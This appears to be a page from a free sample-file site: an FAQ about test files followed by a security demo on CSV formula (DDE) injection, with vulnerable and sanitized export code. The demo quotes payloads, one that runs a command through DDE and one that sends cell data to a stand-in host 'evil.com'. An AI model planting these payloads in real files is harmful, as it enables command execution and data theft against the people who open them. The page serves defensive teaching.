What are sample files used for?

Sample files are used by developers, QA engineers, and designers to test file upload functionality, validate parsers, prototype applications, and verify format support. They provide well-formed examples of real file formats without sensitive data.

Are the sample files free to download?

Yes, all sample files on File Examples are completely free to download. No registration, no limits, and no hidden fees. You can use them for testing, development, and educational purposes.

What file formats are available?

File Examples offers 1000+ sample files in 700+ formats across 50 categories including documents, images, audio, video, code, scripting, AI/ML, blockchain, gaming, firmware, security, science, IoT, DevOps, medical, accessibility, automation, education, legal, API, localization, and many more.

Can I use these files for testing my application?

Absolutely. All files are well-formed, valid examples designed specifically for testing. They contain proper headers, metadata, and realistic content structures — ideal for QA testing, CI/CD pipelines, and development workflows.

How do I download a sample file?

Browse categories or search for a specific format, click on the file you need, and hit the Download button. The file downloads instantly — no signup or email required.

High severity

CSV Formula Injection (DDE Attack)

A CSV file containing cells that start with =, +, -, or @ characters, which spreadsheet applications interpret as formulas, potentially executing system commands via DDE.

How This Attack Works

When a CSV file is opened in Excel or Google Sheets, cells starting with formula characters are evaluated. An attacker can craft cells like '=CMD|'/C calc'!A0' (DDE) or '=HYPERLINK("http://evil.com/steal?data="&A1)' to exfiltrate data or execute commands. This is called CSV injection or formula injection.

Attack Vector

User exports data from a web app. Attacker has injected formula payloads into data fields (e.g., username = '=CMD|...'). Exported CSV is opened in Excel, triggering command execution.

Real-World Example

CSV injection has been found in Google Sheets, Salesforce, HubSpot, and numerous SaaS platforms. Bug bounties have been awarded for this vulnerability class on HackerOne and Bugcrowd.

Vulnerable Code

// UNSAFE: Direct CSV export
const csv = data.map(row =>
  row.map(cell => `"${cell}"`).join(',')
).join('\n');

Safe Implementation

// SAFE: Sanitize formula-triggering characters
function sanitizeCell(value: string): string {
  if (/^[=+\-@\t\r]/.test(value)) {
    return "'" + value; // Prefix with single quote
  }
  return value;
}
const csv = data.map(row =>
  row.map(cell => `"${sanitizeCell(cell)}"`).join(',')
).join('\n');

Safe Handling Guidelines

Prefix cells starting with =, +, -, @, tab, or carriage return with a single quote ('). This tells spreadsheets to treat the content as text, not a formula.

Affected Platforms

Microsoft ExcelGoogle SheetsLibreOffice CalcApple Numbers

Related Security Demos

MIME Spoofing: SVG with Embedded JavaScript (XSS)

mime-spoofing · high

Related Tools & Resources

MIME Detector Checksum Generator Edge-Case Library Compatibility Matrix